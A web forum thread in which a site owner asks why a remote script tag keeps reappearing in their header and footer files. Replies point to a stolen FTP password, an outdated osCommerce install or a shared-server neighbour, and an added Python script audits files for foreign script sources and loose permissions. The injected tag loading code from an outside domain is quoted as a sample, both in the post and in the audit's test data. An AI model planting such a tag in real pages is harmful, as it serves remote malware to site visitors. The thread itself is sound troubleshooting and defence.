Injected Code into my website

PHPGator

A few weeks back I woke up and had Google Webmaster telling me that my site potentially included "malicious spyware / malware". They were nice enough to tell me why they felt that way and pointed me to my source code where I have something like:

<script src="http://domain.in/falb5"></script>

I ended up getting rid of the code out of my header and footer files. I have not noticed anything else different about my site outside of that. I'm still receiving orders and the website has remained up and running.

However, today, the code is back on my website after removing it. I'm not sure how it is being injected.

I have contacted my web host but they don't seem to be all that helpful.

Unfortunately I just don't know how this is happening. Any recommendations? I definitely don't need this to keep happening every few weeks.

Thanks!
 


A similar thing happened to me a few years back. In that instance it was a sniffer/trojan running on my home computer and capturing the password I used for the site's FTP. Check your home computer and make sure it is squeaky clean. Then change all your passwords.

Other options include your site being auto-hacked (check your logs for requests to nonexistent files = bots attempting to discover common CMSs). This applies if you use a common CMS; if so, you should update its version. The final option is that another user on the shared server has hacked it. This is unlikely, but maybe you'd want to use my-ip-neighbors.com and see if any of the other sites have the same code on them.

Good luck bro.
 
I am using cPanel version 11.28.52.

I am also using an older version of OSCommerce to process orders. The odd part is that the files being manipulated are custom files that I have developed. Would OSCommerce still be able to inject code into files not associated with it?

I am going to change my password to see if that helps and I won't login from my home computer for a while and we'll see what happens. It is definitely a little bit unnerving knowing that something or someone has that type of access to my website though.
 
Hmmm, just read about it online, it does have to do with OSCommerce being an older version. Apparently there are hundreds of Russian domains going after them and just one of the domains affected nearly 3000 websites. Time for an upgrade!
 
Check your file permissions. Any file which doesn't need to update itself should be CHMOD 644. Yes, that includes your site's themes after you've made changes to them.
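
Added example, not part of the thread or any poster's code: a small Python audit combining two checks discussed above, finding `<script src>` tags that point at hosts outside an allowlist and flagging files writable by group or others (looser than 644). `ALLOWED_HOSTS`, `SCAN_EXT` and the sample tree built in `demo()` are assumptions constructed for illustration.

```python
import os
import re
import stat
import tempfile
from urllib.parse import urlparse

# Assumption: hosts this site legitimately loads scripts from; adjust per site.
ALLOWED_HOSTS = {"www.example.com"}
SCRIPT_SRC = re.compile(r"""<script[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)
SCAN_EXT = (".php", ".html", ".htm", ".js", ".tpl", ".inc")

def external_scripts(text, allowed=ALLOWED_HOSTS):
    """Return script src URLs whose host is not on the allowlist."""
    urls = SCRIPT_SRC.findall(text)
    # hostname is None for relative URLs, which stay on the site itself.
    return [u for u in urls if (h := urlparse(u).hostname) and h.lower() not in allowed]

def audit(webroot, allowed=ALLOWED_HOSTS):
    """Return sorted (relative path, foreign script URLs, mode, looser-than-644)."""
    findings = []
    for dirpath, _dirs, files in os.walk(webroot):
        for name in files:
            if not name.lower().endswith(SCAN_EXT):
                continue
            path = os.path.join(dirpath, name)
            mode = stat.S_IMODE(os.stat(path).st_mode)
            # Writable by group or other means another account could modify it.
            loose = bool(mode & (stat.S_IWGRP | stat.S_IWOTH))
            with open(path, encoding="utf-8", errors="replace") as fh:
                urls = external_scripts(fh.read(), allowed)
            if urls or loose:
                findings.append((os.path.relpath(path, webroot), urls, oct(mode), loose))
    return sorted(findings)

def demo():
    """Constructed sample tree: one tampered header, one clean footer."""
    root = tempfile.mkdtemp()
    samples = {
        "header.php": ('<script src="http://domain.in/falb5"></script>', 0o666),
        "footer.php": ('<script src="/js/site.js"></script>', 0o644),
    }
    for name, (body, mode) in samples.items():
        path = os.path.join(root, name)
        with open(path, "w") as fh:
            fh.write(body)
        os.chmod(path, mode)
    return audit(root)

if __name__ == "__main__":
    print(demo())
```

Run on a schedule against the real web root, a new finding shows which file was re-infected and when, which can then be matched against FTP and cPanel login records.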
 
Stored FTP passwords from old versions of Total Commander could be haxored
 
Stored FTP passwords from old versions of Total Commander could be haxored

Also some not-so-old versions of FileZilla are vulnerable to trojans.
 
I had the same thing happen a few months ago. Call up support and have them look at the logins being made and from where. Then change your cPanel password.